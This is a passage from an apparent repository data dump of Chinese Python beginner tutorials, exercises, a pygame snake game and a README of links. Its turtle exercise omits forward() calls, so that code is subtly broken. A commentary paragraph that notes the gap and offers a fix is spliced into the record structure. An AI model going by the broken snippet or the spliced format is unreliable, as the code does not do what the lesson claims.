编译型语言比解释型语言执行速度快\n- **跨平台性** —— 解释型语言比编译型语言跨平台性好\n\n#### Python的特点\n\n- Python 是\n\n 完全面向对象的语言\n\n - **函数**、**模块**、**数字**、**字符串**都是对象,**在 Python 中一切皆对象**\n - 完全支持继承、重载、多重继承\n - 支持重载运算符,也支持泛型设计\n\n- Python **拥有一个强大的标准库**,Python 语言的核心只包含 **数字**、**字符串**、**列表**、**字典**、**文件** 等常见类型和函数,而由 Python 标准库提供了 **系统管理**、**网络通信**、**文本处理**、**数据库接口**、**图形系统**、**XML 处理** 等额外的功能\n\n- Python 社区提供了**大量的第三方模块**,使用方式与标准库类似。它们的功能覆盖 **科学计算**、**人工智能**、**机器学习**、**Web 开发**、**数据库接口**、**图形系统** 多个领域\n\n#### Python的优缺点\n\nPython的优点很多,简单的可以总结为以下几点。\n\n1. 简单明了,学习曲线低,比很多编程语言都容易上手。\n2. 开放源代码,拥有强大的社区和生态圈,尤其是在数据分析和机器学习领域。\n3. 解释型语言,天生具有平台可移植性,代码可以工作于不同的操作系统。\n4. 对两种主流的编程范式(面向对象编程和函数式编程)都提供了支持。\n5. 代码规范程度高,可读性强,适合有代码洁癖和强迫症的人群。\n\nPython的缺点主要集中在以下几点。\n\n1. 执行效率稍低,对执行效率要求高的部分可以由其他语言(如:C、C++)编写。\n2. 代码无法加密,但是现在很多公司都不销售卖软件而是销售服务,这个问题会被弱化。\n3. 在开发时可以选择的框架太多(如Web框架就有100多个),有选择的地方就有错误。\n\n#### Python的应用领域\n\nPython在Web应用后端开发、云基础设施建设、DevOps、网络数据采集(爬虫)、自动化测试、数据分析、机器学习等领域都有着广泛的应用。\n\n#### 搭建编译环境\n\n> 介绍一下Python有什么解释器\n\n**Python 的解释器** 如今有多个语言的实现,包括:\n\n- `CPython` —— 官方版本的 C 语言实现\n- `Jython` —— 可以运行在 Java 平台\n- `IronPython` —— 可以运行在 .NET 和 Mono 平台\n- `PyPy` —— Python 实现的,支持 JIT 即时编译\n\n### 交互式运行 Python 程序\n\n- 直接在终端中运行解释器,而不输入要执行的文件名\n- 在 Python 的 `Shell` 中直接输入 **Python 的代码**,会立即看到程序执行结果\n\n#### 1) 交互式运行 Python 的优缺点\n\n##### 优点\n\n- 适合于学习/验证 Python 语法或者局部代码\n\n##### 缺点\n\n- 代码不能保存\n- 不适合运行太大的程序\n\n#### Windows环境\n\n> 安装\n\n\n\n首先,检查你的系统是否安装了Python。为此,在“开始”菜单中输入command 并按回车以打开一个命令窗口;你也可按住Shift键并右击桌面,再选择“在此处打开命令窗口”。在终 \n\n端窗口中输入python并按回车;如果出现了Python提示符(>>> ),就说明你的系统安装了Python。然而,你也可能会看到一条错误消息,指出python 是无法识别的命令。 \n\n如果是这样,就需要下载Windows Python安装程序。为此,请访问http://python.org/downloads/ 。你将看到两个按钮,分别用于下载Python 3和Python 2。单击用于下载Python 3的按 \n\n钮,这会根据你的系统自动下载正确的安装程序。下载安装程序后,运行它。请务必选中复选框Add Python to PATH(如图1-2所示),这让你能够更轻松地配置系统。 \n\n\n\n\n\n如果系统显示api-ms-win-crt*.dll文件缺失,可以参照[《api-ms-win-crt*.dll缺失原因分析和解决方法》](https://zhuanlan.zhihu.com/p/32087135)一文讲解的方法进行处理或者直接在[微软官网](https://www.microsoft.com/zh-cn/download/details.aspx?id=48145)下载Visual C++ Redistributable for Visual Studio 2015文件进行修复;如果是因为更新Windows的DirectX之后导致某些动态链接库文件缺失问题,可以下载一个[DirectX修复工具](https://dl.pconline.com.cn/download/360074-1.html)进行修复。\n\n**2.** 启动Python终端\n\n通过配置系统,让其能够在终端会话中运行Python,可简化文本编辑器的配置工作。打开一个命令窗口,并在其中执行命令python 。如果出现了Python提示符(>>> ),就说明 \n\nWindows找到了你刚安装的Python版本。 \n\n#### Linux环境\n\nLinux环境自带了Python 2.x版本,但是如果要更新到3.x的版本,可以在[Python的官方网站](https://www.python.org/)下载Python的源代码并通过源代码构建安装的方式进行安装,具体的步骤如下所示(以CentOS为例)。\n\n1. 安装依赖库(因为没有这些依赖库可能在源代码构件安装时因为缺失底层依赖库而失败)。\n\n```\nyum -y install wget gcc zlib-devel bzip2-devel openssl-devel ncurses-devel sqlite-devel readline-devel tk-devel gdbm-devel db4-devel libpcap-devel xz-devel libffi-devel\n```\n\n1. 
下载Python源代码并解压缩到指定目录。\n\n```\nwget https://www.python.org/ftp/python/3.7.6/Python-3.7.6.tar.xz\nxz -d Python-3.7.6.tar.xz\ntar -xvf Python-3.7.6.tar\n```\n\n1. 切换至Python源代码目录并执行下面的命令进行配置和安装。\n\n```\ncd Python-3.7.6\n./configure --prefix=/usr/local/python37 --enable-optimizations\nmake && make install\n```\n\n1. 修改用户主目录下名为.bash_profile的文件,配置PATH环境变量并使其生效。\n\n```\ncd ~\nvim .bash_profile\n# ... 此处省略上面的代码 ...\n\nexport PATH=$PATH:/usr/local/python37/bin\n\n# ... 此处省略下面的代码 ...\n```\n\n1. 激活环境变量。\n\n```\nsource .bash_profile\n```\n\n#### macOS环境\n\nmacOS也自带了Python 2.x版本,可以通过[Python的官方网站](https://www.python.org/)提供的安装文件(pkg文件)安装Python 3.x的版本。默认安装完成后,可以通过在终端执行`python`命令来启动2.x版本的Python解释器,启动3.x版本的Python解释器需要执行`python3`命令。\n\n### 运行Python程序\n\n#### 确认Python的版本\n\n可以Windows的命令行提示符中键入下面的命令。\n\n```\npython --version\n```\n\n\n\n在Linux或macOS系统的终端中键入下面的命令。\n\n```\npython3 --version\n```\n\n当然也可以先输入`python`或`python3`进入交互式环境,再执行以下的代码检查Python的版本。\n\n```\nimport sys\n\nprint(sys.version_info)\nprint(sys.version)\n```\n\n\n\n### 第一个Python程序\n\n#### 我们可以现在Python自带的idle中写我们的代码\n\n\n\n#### PyCharm - Python开发神器\n\n### 1) 集成开发环境(IDE)\n\n集成开发环境(`IDE`,Integrated Development Environment)—— **集成了开发软件需要的所有工具**,一般包括以下工具:\n\n- 图形用户界面\n- 代码编辑器(支持 **代码补全**/**自动缩进**)\n- 编译器/解释器\n- 调试器(**断点**/**单步执行**)\n- ……\n\n### 2)PyCharm 介绍\n\n- `PyCharm` 是 Python 的一款非常优秀的集成开发环境\n\n- `PyCharm` 除了具有一般 IDE 所必备功能外,还可以在 `Windows`、`Linux`、`macOS` 下使用\n\n- ```\n PyCharm\n ```\n\n \n\n 适合开发大型项目\n\n - 一个项目通常会包含 **很多源文件**\n - 每个 **源文件** 的代码行数是有限的,通常在几百行之内\n - 每个 **源文件** 各司其职,共同完成复杂的业务功能\n\n\n\n- **文件导航区域** 能够 **浏览**/**定位**/**打开** 项目文件\n\n- **文件编辑区域** 能够 **编辑** 当前打开的文件\n\n- 控制台区域\n\n \n\n 能够:\n\n - 输出程序执行内容\n - 跟踪调试代码的执行\n\n- 右上角的 **工具栏** 能够 **执行(SHIFT + F10)** / **调试(SHIFT + F9)** 代码\n\n\n\n- 通过控制台上方的**单步执行按钮(F8)**,可以单步执行代码\n\n\n\n\n\n### 注释\n\n- 注释的作用\n- 单行注释(行注释)\n- 多行注释(块注释)\n\n## 01. 注释的作用\n\n> 使用用自己熟悉的语言,在程序中对某些代码进行标注说明,增强程序的可读性\n\n## 单行注释(行注释)\n\n- 以 `#` 开头,`#` 右边的所有东西都被当做说明文字,而不是真正要执行的程序,只起到辅助说明作用\n- 示例代码如下:\n\n```\n# 这是第一个单行注释\nprint(\"hello python\")\n```\n\n> 为了保证代码的可读性,`#` 后面建议先添加一个空格,然后再编写相应的说明文字\n\n### 在代码后面增加的单行注释\n\n- 在程序开发时,同样可以使用 `#` 在代码的后面(旁边)增加说明性的文字\n- 但是,需要注意的是,**为了保证代码的可读性**,**注释和代码之间** 至少要有 **两个空格**\n- 示例代码如下:\n\n```\nprint(\"hello python\") # 输出 `hello python`\n```\n\n## 多行注释(块注释)\n\n- 如果希望编写的 **注释信息很多,一行无法显示**,就可以使用多行注释\n- 要在 Python 程序中使用多行注释,可以用 **一对 连续的 三个 引号**(单引号和双引号都可以)\n- 示例代码如下:\n\n```\n\"\"\"\n这是一个多行注释\n\n在多行注释之间,可以写很多很多的内容……\n\"\"\" \nprint(\"hello python\")\n```\n\n### 什么时候需要使用注释?\n\n1. **注释不是越多越好**,对于一目了然的代码,不需要添加注释\n2. 对于 **复杂的操作**,应该在操作开始前写上若干行注释\n3. 对于 **不是一目了然的代码**,应在其行尾添加注释(为了提高可读性,注释应该至少离开代码 2 个空格)\n4. 绝不要描述代码,假设阅读代码的人比你更懂 Python,他只是不知道你的代码要做什么\n\n> 在一些正规的开发团队,通常会有 **代码审核** 的惯例,就是一个团队中彼此阅读对方的代码\n\n### 关于代码规范\n\n- `Python` 官方提供有一系列 PEP(Python Enhancement Proposals) 文档\n- 其中第 8 篇文档专门针对 **Python 的代码格式** 给出了建议,也就是俗称的 **PEP 8**\n- 文档地址:https://www.python.org/dev/peps/pep-0008/\n- 谷歌有对应的中文文档:http://zh-google-styleguide.readthedocs.io/en/latest/google-python-styleguide/python_style_rules/\n\n> 任何语言的程序员,编写出符合规范的代码,是开始程序生涯的第一步\n\n\n\n\n\n### 拓展 -- 认识一下一些错误\n\n#### 关于错误\n\n- 编写的程序**不能正常执行**,或者**执行的结果不是我们期望的**\n\n- 俗称\n\n \n\n ```\n BUG\n ```\n\n ,是程序员在开发时非常常见的,初学者常见错误的原因包括:\n\n 1. 手误\n 2. 对已经学习过的知识理解还存在不足\n 3. 
对语言还有需要学习和提升的内容\n\n- 在学习语言时,不仅要**学会语言的语法**,而且还要**学会如何认识错误和解决错误的方法**\n\n> 每一个程序员都是在不断地修改错误中成长的\n\n#### 第一个演练中的常见错误\n\n- 1> **手误**,例如使用 `pirnt(\"Hello world\")`\n\n```\nNameError: name 'pirnt' is not defined\n\n名称错误:'pirnt' 名字没有定义\n```\n\n- 2> 将多条 `print` 写在一行\n\n```\nSyntaxError: invalid syntax\n\n语法错误:语法无效\n```\n\n> 每行代码负责完成一个动作\n\n- 3> 缩进错误\n\n```\nIndentationError: unexpected indent\n\n缩进错误:不期望出现的缩进\n```\n\n> - Python 是一个格式非常严格的程序设计语言\n> - 目前而言,大家记住每行代码前面都不要增加空格\n\n#### 单词列表\n\n```\n* error 错误\n* name 名字\n* defined 已经定义\n* syntax 语法\n* invalid 无效\n* Indentation 索引\n* unexpected 意外的,不期望的\n* character 字符\n* line 行\n* encoding 编码\n* declared 声明\n* details 细节,详细信息\n* ASCII 一种字符编码\n```\n\n\n\n\n\n### 练习\n\n让我们一起得到Python之禅\n\n1.在Python交互式环境中输入下面的代码并查看结果\n\n```\nimport this\n```\n\n\n\n2. 学习使用turtle在屏幕上绘制图形。\n\n> **说明**:turtle是Python内置的一个非常有趣的模块,特别适合对计算机程序设计进行初体验的小伙伴,它最早是Logo语言的一部分,Logo语言是Wally Feurzig和Seymour Papert在1966发明的编程语言。\n\n```\nimport turtle\n\nturtle.pensize(4)\nturtle.pencolor('red')\n\n\nturtle.right(90)\n\nturtle.right(90)\nturtle.forward(100)\nturtle.right(90)\nturtle.forward(100)\n\nturtle.mainloop()\n```\n\n\n"
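需要注意,上面练习2中的 turtle 代码片段在前两条边处缺少 forward() 调用,按原样运行画不出封闭图形;如果原意是画一个红色正方形(这里只是推测,并非原文给出的答案),补全后的版本可以写成:

```python
import turtle

turtle.pensize(4)
turtle.pencolor('red')

# 画正方形:每前进100像素后右转90度,重复四次
for _ in range(4):
    turtle.forward(100)
    turtle.right(90)

turtle.mainloop()
```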
},
{
"alpha_fraction": 0.5497939586639404,
"alphanum_fraction": 0.5896291136741638,
"avg_line_length": 27.831684112548828,
"blob_id": "fc1a0154d19437826c82f085fe2688607fadd189",
"content_id": "5e03defd9cc930b8d22f45cbb5615049f5481c55",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 5034,
"license_type": "permissive",
"max_line_length": 243,
"num_lines": 101,
"path": "/Python基础连载/综合练习.md",
"repo_name": "xiaofengyvan/PythonGuide",
"src_encoding": "UTF-8",
"text": "# Python连载系列:综合练习\n\n学完前面的几个章节后,我觉得有必要在这里带大家做一些练习来巩固之前所学的知识,虽然迄今为止我们学习的内容只是Python的冰山一角,但是这些内容已经足够我们来构建程序中的逻辑。对于编程语言的初学者来说,在学习了Python的核心语言元素(变量、类型、运算符、表达式、分支结构、循环结构等)之后,必须做的一件事情就是尝试用所学知识去解决现实中的问题,换句话说就是锻炼自己把用人类自然语言描述的算法(解决问题的方法和步骤)翻译成Python代码的能力,而这件事情必须通过大量的练习才能达成。\n\n我们在本章为大家整理了一些经典的案例和习题,希望通过这些例子,一方面帮助大家巩固之前所学的Python知识,另一方面帮助大家了解如何建立程序中的逻辑以及如何运用一些简单的算法解决现实中的问题。\n\n### 经典的例子\n\n1. 寻找**水仙花数**。\n\n > **说明**:水仙花数也被称为超完全数字不变数、自恋数、自幂数、阿姆斯特朗数,它是一个3位数,该数字每个位上数字的立方之和正好等于它本身,例如:$1^3 + 5^3+ 3^3=153$。\n\n ```\n \"\"\"\n 找出所有水仙花数\n \n \"\"\"\n \n for num in range(100, 1000):\n low = num % 10\n mid = num // 10 % 10\n high = num // 100\n if num == low ** 3 + mid ** 3 + high ** 3:\n print(num)\n ```\n\n 在上面的代码中,我们通过整除和求模运算分别找出了一个三位数的个位、十位和百位,这种小技巧在实际开发中还是常用的。用类似的方法,我们还可以实现将一个正整数反转,例如:将12345变成54321,代码如下所示。\n\n ```\n \"\"\"\n 正整数的反转\n \"\"\"\n \n num = int(input('num = '))\n reversed_num = 0\n while num > 0:\n reversed_num = reversed_num * 10 + num % 10\n num //= 10\n print(reversed_num)\n ```\n\n2. **百钱百鸡**问题。\n\n > **说明**:百钱百鸡是我国古代数学家[张丘建](https://baike.baidu.com/item/张丘建/10246238)在《算经》一书中提出的数学问题:鸡翁一值钱五,鸡母一值钱三,鸡雏三值钱一。百钱买百鸡,问鸡翁、鸡母、鸡雏各几何?翻译成现代文是:公鸡5元一只,母鸡3元一只,小鸡1元三只,用100块钱买一百只鸡,问公鸡、母鸡、小鸡各有多少只?\n\n ```\n for x in range(0, 20):\n for y in range(0, 33):\n z = 100 - x - y\n if 5 * x + 3 * y + z / 3 == 100:\n print('公鸡: %d只, 母鸡: %d只, 小鸡: %d只' % (x, y, z))\n ```\n\n 上面使用的方法叫做**穷举法**,也称为**暴力搜索法**,这种方法通过一项一项的列举备选解决方案中所有可能的候选项并检查每个候选项是否符合问题的描述,最终得到问题的解。这种方法看起来比较笨拙,但对于运算能力非常强大的计算机来说,通常都是一个可行的甚至是不错的选择,而且问题的解如果存在,这种方法一定能够找到它。\n\n3. **CRAPS赌博游戏**。\n\n > **说明**:CRAPS又称花旗骰,是美国拉斯维加斯非常受欢迎的一种的桌上赌博游戏。该游戏使用两粒骰子,玩家通过摇两粒骰子获得点数进行游戏。简单的规则是:玩家第一次摇骰子如果摇出了7点或11点,玩家胜;玩家第一次如果摇出2点、3点或12点,庄家胜;其他点数玩家继续摇骰子,如果玩家摇出了7点,庄家胜;如果玩家摇出了第一次摇的点数,玩家胜;其他点数,玩家继续要骰子,直到分出胜负。\n\n ```\n \"\"\"\n Craps赌博游戏\n 我们设定玩家开始游戏时有1000元的赌注\n 游戏结束的条件是玩家输光所有的赌注\n \"\"\"\n from random import randint\n \n money = 1000\n while money > 0:\n print('你的总资产为:', money)\n needs_go_on = False\n while True:\n debt = int(input('请下注: '))\n if 0 < debt <= money:\n break\n first = randint(1, 6) + randint(1, 6)\n print('玩家摇出了%d点' % first)\n if first == 7 or first == 11:\n print('玩家胜!')\n money += debt\n elif first == 2 or first == 3 or first == 12:\n print('庄家胜!')\n money -= debt\n else:\n needs_go_on = True\n while needs_go_on:\n needs_go_on = False\n current = randint(1, 6) + randint(1, 6)\n print('玩家摇出了%d点' % current)\n if current == 7:\n print('庄家胜')\n money -= debt\n elif current == first:\n print('玩家胜')\n money += debt\n else:\n needs_go_on = True\n print('你破产了, 游戏结束!')\n ```\n\n\n"
},
{
"alpha_fraction": 0.6187565326690674,
"alphanum_fraction": 0.6433810591697693,
"avg_line_length": 29.136842727661133,
"blob_id": "988931c6bba8b9908188d2b6e0ee7b989e421a18",
"content_id": "3f58324f8438bce61d7a2b26d3fc54ce50debed5",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6560,
"license_type": "permissive",
"max_line_length": 111,
"num_lines": 190,
"path": "/code/snake.py",
"repo_name": "xiaofengyvan/PythonGuide",
"src_encoding": "UTF-8",
"text": "## 导入相关模块\nimport random\nimport pygame\nimport sys\n\nfrom pygame.locals import *\n\n\nsnake_speed = 15 #贪吃蛇的速度\nwindows_width = 800\nwindows_height = 600 #游戏窗口的大小\ncell_size = 20 #贪吃蛇身体方块大小,注意身体大小必须能被窗口长宽整除\n\n''' #初始化区\n由于我们的贪吃蛇是有大小尺寸的, 因此地图的实际尺寸是相对于贪吃蛇的大小尺寸而言的\n'''\nmap_width = int(windows_width / cell_size)\nmap_height = int(windows_height / cell_size)\n\n# 颜色定义\nwhite = (255, 255, 255)\nblack = (0, 0, 0)\ngray = (230, 230, 230)\ndark_gray = (40, 40, 40)\nDARKGreen = (0, 155, 0)\nGreen = (0, 255, 0)\nRed = (255, 0, 0)\nblue = (0, 0, 255)\ndark_blue =(0,0, 139)\n\n\nBG_COLOR = black #游戏背景颜色\n\n# 定义方向\nUP = 1\nDOWN = 2\nLEFT = 3\nRIGHT = 4\n\nHEAD = 0 #贪吃蛇头部下标\n#主函数\ndef main():\n\tpygame.init() # 模块初始化\n\tsnake_speed_clock = pygame.time.Clock() # 创建Pygame时钟对象\n\tscreen = pygame.display.set_mode((windows_width, windows_height)) #\n\tscreen.fill(white)\n\n\tpygame.display.set_caption(\"Python 贪吃蛇小游戏\") #设置标题\n\tshow_start_info(screen) #欢迎信息\n\twhile True:\n\t\trunning_game(screen, snake_speed_clock)\n\t\tshow_gameover_info(screen)\n#游戏运行主体\ndef running_game(screen,snake_speed_clock):\n\tstartx = random.randint(3, map_width - 8) #开始位置\n\tstarty = random.randint(3, map_height - 8)\n\tsnake_coords = [{'x': startx, 'y': starty}, #初始贪吃蛇\n {'x': startx - 1, 'y': starty},\n {'x': startx - 2, 'y': starty}]\n\n\tdirection = RIGHT # 开始时向右移动\n\n\tfood = get_random_location() #实物随机位置\n\n\twhile True:\n\t\tfor event in pygame.event.get():\n\t\t\tif event.type == QUIT:\n\t\t\t\tterminate()\n\t\t\telif event.type == KEYDOWN:\n\t\t\t\tif (event.key == K_LEFT or event.key == K_a) and direction != RIGHT:\n\t\t\t\t\tdirection = LEFT\n\t\t\t\telif (event.key == K_RIGHT or event.key == K_d) and direction != LEFT:\n\t\t\t\t\tdirection = RIGHT\n\t\t\t\telif (event.key == K_UP or event.key == K_w) and direction != DOWN:\n\t\t\t\t\tdirection = UP\n\t\t\t\telif (event.key == K_DOWN or event.key == K_s) and direction != UP:\n\t\t\t\t\tdirection = DOWN\n\t\t\t\telif event.key == K_ESCAPE:\n\t\t\t\t\tterminate()\n\n\t\tmove_snake(direction, snake_coords) #移动蛇\n\n\t\tret = snake_is_alive(snake_coords)\n\t\tif not ret:\n\t\t\tbreak #蛇跪了. 
游戏结束\n\t\tsnake_is_eat_food(snake_coords, food) #判断蛇是否吃到食物\n\n\t\tscreen.fill(BG_COLOR)\n\t\t#draw_grid(screen)\n\t\tdraw_snake(screen, snake_coords)\n\t\tdraw_food(screen, food)\n\t\tdraw_score(screen, len(snake_coords) - 3)\n\t\tpygame.display.update()\n\t\tsnake_speed_clock.tick(snake_speed) #控制fps\n#将食物画出来\ndef draw_food(screen, food):\n\tx = food['x'] * cell_size\n\ty = food['y'] * cell_size\n\tappleRect = pygame.Rect(x, y, cell_size, cell_size)\n\tpygame.draw.rect(screen, Red, appleRect)\n#将贪吃蛇画出来\ndef draw_snake(screen, snake_coords):\n\tfor coord in snake_coords:\n\t\tx = coord['x'] * cell_size\n\t\ty = coord['y'] * cell_size\n\t\twormSegmentRect = pygame.Rect(x, y, cell_size, cell_size)\n\t\tpygame.draw.rect(screen, dark_blue, wormSegmentRect)\n\t\twormInnerSegmentRect = pygame.Rect( #蛇身子里面的第二层亮绿色\n\t\t\tx + 4, y + 4, cell_size - 8, cell_size - 8)\n\t\tpygame.draw.rect(screen, blue, wormInnerSegmentRect)\n#移动贪吃蛇\ndef move_snake(direction, snake_coords):\n if direction == UP:\n newHead = {'x': snake_coords[HEAD]['x'], 'y': snake_coords[HEAD]['y'] - 1}\n elif direction == DOWN:\n newHead = {'x': snake_coords[HEAD]['x'], 'y': snake_coords[HEAD]['y'] + 1}\n elif direction == LEFT:\n newHead = {'x': snake_coords[HEAD]['x'] - 1, 'y': snake_coords[HEAD]['y']}\n elif direction == RIGHT:\n newHead = {'x': snake_coords[HEAD]['x'] + 1, 'y': snake_coords[HEAD]['y']}\n\n snake_coords.insert(0, newHead)\n#判断蛇死了没\ndef snake_is_alive(snake_coords):\n\ttag = True\n\tif snake_coords[HEAD]['x'] == -1 or snake_coords[HEAD]['x'] == map_width or snake_coords[HEAD]['y'] == -1 or \\\n\t\t\tsnake_coords[HEAD]['y'] == map_height:\n\t\ttag = False # 蛇碰壁啦\n\tfor snake_body in snake_coords[1:]:\n\t\tif snake_body['x'] == snake_coords[HEAD]['x'] and snake_body['y'] == snake_coords[HEAD]['y']:\n\t\t\ttag = False # 蛇碰到自己身体啦\n\treturn tag\n#判断贪吃蛇是否吃到食物\ndef snake_is_eat_food(snake_coords, food): #如果是列表或字典,那么函数内修改参数内容,就会影响到函数体外的对象。\n\tif snake_coords[HEAD]['x'] == food['x'] and snake_coords[HEAD]['y'] == food['y']:\n\t\tfood['x'] = random.randint(0, map_width - 1)\n\t\tfood['y'] = random.randint(0, map_height - 1) # 实物位置重新设置\n\telse:\n\t\tdel snake_coords[-1] # 如果没有吃到实物, 就向前移动, 那么尾部一格删掉\n#食物随机生成\ndef get_random_location():\n\treturn {'x': random.randint(0, map_width - 1), 'y': random.randint(0, map_height - 1)}\n#开始信息显示\ndef show_start_info(screen):\n\tfont = pygame.font.Font('myfont.ttf', 40)\n\ttip = font.render('按任意键开始游戏~~~', True, (65, 105, 225))\n\tgamestart = pygame.image.load('gamestart.png')\n\tscreen.blit(gamestart, (140, 30))\n\tscreen.blit(tip, (240, 550))\n\tpygame.display.update()\n\n\twhile True: #键盘监听事件\n\t\tfor event in pygame.event.get(): # event handling loop\n\t\t\tif event.type == QUIT:\n\t\t\t\tterminate() #终止程序\n\t\t\telif event.type == KEYDOWN:\n\t\t\t\tif (event.key == K_ESCAPE): #终止程序\n\t\t\t\t\tterminate() #终止程序\n\t\t\t\telse:\n\t\t\t\t\treturn #结束此函数, 开始游戏\n#游戏结束信息显示\ndef show_gameover_info(screen):\n\tfont = pygame.font.Font('myfont.ttf', 40)\n\ttip = font.render('按Q或者ESC退出游戏, 按任意键重新开始游戏~', True, (65, 105, 225))\n\tgamestart = pygame.image.load('gameover.png')\n\tscreen.blit(gamestart, (60, 0))\n\tscreen.blit(tip, (80, 300))\n\tpygame.display.update()\n\n\twhile True: #键盘监听事件\n\t\tfor event in pygame.event.get(): # event handling loop\n\t\t\tif event.type == QUIT:\n\t\t\t\tterminate() #终止程序\n\t\t\telif event.type == KEYDOWN:\n\t\t\t\tif event.key == K_ESCAPE or event.key == K_q: #终止程序\n\t\t\t\t\tterminate() #终止程序\n\t\t\t\telse:\n\t\t\t\t\treturn #结束此函数, 重新开始游戏\n#画成绩\ndef 
draw_score(screen,score):\n\tfont = pygame.font.Font('myfont.ttf', 30)\n\tscoreSurf = font.render('得分: %s' % score, True, Green)\n\tscoreRect = scoreSurf.get_rect()\n\tscoreRect.topleft = (windows_width - 120, 10)\n\tscreen.blit(scoreSurf, scoreRect)\n#程序终止\ndef terminate():\n\tpygame.quit()\n\tsys.exit()\nmain()\n"
},
{
"alpha_fraction": 0.6468493938446045,
"alphanum_fraction": 0.7369170784950256,
"avg_line_length": 30.920454025268555,
"blob_id": "67bae7b641709aae9296a659a13b272ed238bec5",
"content_id": "65c3781917f621c4e93c7ca7ba075e430b3e7827",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 3769,
"license_type": "permissive",
"max_line_length": 179,
"num_lines": 88,
"path": "/README.md",
"repo_name": "xiaofengyvan/PythonGuide",
"src_encoding": "UTF-8",
"text": "> 介绍:本仓库为自己学习过程中,汇集的知识点和一些面试经验等。如果对大家有帮助,请多多star,谢谢各位!\n\n## 资源获取\n上百本计算机书籍pdf收集\n> https://github.com/hellgoddess/ITBook\n\n获取Python100道练习题\n> https://github.com/hellgoddess/PythonGuide/tree/main/Python100%E9%81%93%E7%BB%83%E4%B9%A0%E9%A2%98\n\n思维导图\n> 链接:https://pan.baidu.com/s/1Gc7A9qdXnfqVkEJl2-PhaA 提取码:k063 Python思维导图\n\n> 链接:https://pan.baidu.com/s/1SJKo-DArTU1JHgd7e4mOTg 提取码:du5o MySQL思维导图\n\n\n计算机网络pdf:\n> 链接: https://github.com/hellgoddess/PythonGuide/blob/main/docs/%E8%8E%B7%E5%8F%96%E8%AE%A1%E7%AE%97%E6%9C%BA%E7%BD%91%E7%BB%9Cpdf.md\n\n# Python\n## 基础\n#### 知识点/面试题(必看:muscle:)\n1. [python基础连载系列](https://github.com/hellgoddess/PythonGuide/tree/main/Python%E5%9F%BA%E7%A1%80%E8%BF%9E%E8%BD%BD)(点击跳转到页面::heartpulse:)\n2. [python常见面试题汇总](https://github.com/hellgoddess/PythonGuide/blob/main/docs/python_%20Interview.md)\n3. [十二张Python思维导图带你学会Python](https://mp.weixin.qq.com/s/cTi12tOugs8y52hmBBTafg) 高清图片获取在gihub顶部\n\n#### 重要知识点讲解:\n1. [python的生成器,迭代器和装饰器详解](https://mp.weixin.qq.com/s/hKMk285LRmGt7nDbMdepXw)\n2. [一文读懂python68个内置函数](https://mp.weixin.qq.com/s/vtMHgt6kknU94fVZwfWjUA)\n3. [学了这么久Python,你知道Python有多少关键字吗?硬核总结来了!](https://mp.weixin.qq.com/s/tIaegWbFC-sHawKBmaiwnw)\n4. [Python魔法方法指南](https://pyzh.readthedocs.io/en/latest/python-magic-methods-guide.html#id8)\n\n#### python的容器分析:\n\n\n#### python并发编程:\n1. [python多线程多进程详解](https://mp.weixin.qq.com/s/2aA7ke4lpcpdLK0etDmK4g)\n\n#### python垃圾回收机制:\n\n## 网络\n1. [一文搞定HTTP面试内容-上](https://mp.weixin.qq.com/s/7sO8CteDjkz2d6y4jX2eNQ)\n2. [一文搞定HTTP面试内容-下](https://mp.weixin.qq.com/s/1Umm6Ror1z-7oBCEBe6o5g)\n3. [60道计算机网络面试题请你查收~(上)(1-30](https://mp.weixin.qq.com/s/NAE4Lzvu8LO1Q6GrrdZHxg)\n4. [60道计算机网络面试题请你查收~(下)(31-61](https://mp.weixin.qq.com/s/LcnOAdKq_8qG8hJ6ORAVsw)\n\n## 操作系统\n\n\n### 数据结构与算法\n#### 常见数据结构\n#### 算法\n\n+ [算法学习和书籍推荐](https://www.zhihu.com/question/323359308/answer/1545320858)\n+ [如何刷Leetcode](https://www.zhihu.com/question/31092580/answer/1534887374)\n\n算法总结:\n\n1.[一文学会Python十大排序算法](https://github.com/hellgoddess/PythonGuide/blob/main/docs/%E4%B8%80%E6%96%87%E5%AD%A6%E4%BC%9APython%E5%8D%81%E5%A4%A7%E6%8E%92%E5%BA%8F%E7%AE%97%E6%B3%95.md)\n\n\n## 数据库\n#### MySQL\n#### 总结:\n1.[MySQL知识思维导图总结!](https://mp.weixin.qq.com/s/aMWgviKYMOX4GJ_ZfhJJXA)\n\n2.[一千行MySQL命令](https://github.com/hellgoddess/PythonGuide/blob/main/docs/%E4%B8%80%E5%8D%83%E8%A1%8CMySQL%E5%91%BD%E4%BB%A4.md)\n\n3.[MySQL高性能优化规范建议](https://github.com/hellgoddess/PythonGuide/blob/main/docs/MySQL%E9%AB%98%E6%80%A7%E8%83%BD%E4%BC%98%E5%8C%96%E8%A7%84%E8%8C%83%E5%BB%BA%E8%AE%AE.md)\n\n#### 重要知识点:\n#### 面经问题总结:\n#### Redis\n\n## 常见应用\n\n#### 爬虫学习与实战:\n1.[从0到1学习爬虫-爬虫是什么,爬虫能吃吗?](https://mp.weixin.qq.com/s/ObfZMqEPAO8Ap78wRGN3rw)\n#### Django学习与实战\n#### Flask学习与实战\n\n\n## python学习常见问题汇总\n\n## Python实战与小技巧\n\n> 公众号为:CookDev,文章首发公众号,谢谢大家的关注,一起进步。\n\n\n"
},
{
"alpha_fraction": 0.564165472984314,
"alphanum_fraction": 0.597836971282959,
"avg_line_length": 25.3764705657959,
"blob_id": "07e64d897783b23b135908038dfe418771da6ed6",
"content_id": "82ddba6cac5e5696f26dc9184a60d924968c87a2",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 12355,
"license_type": "permissive",
"max_line_length": 177,
"num_lines": 340,
"path": "/docs/一文学会Python十大排序算法.md",
"repo_name": "xiaofengyvan/PythonGuide",
"src_encoding": "UTF-8",
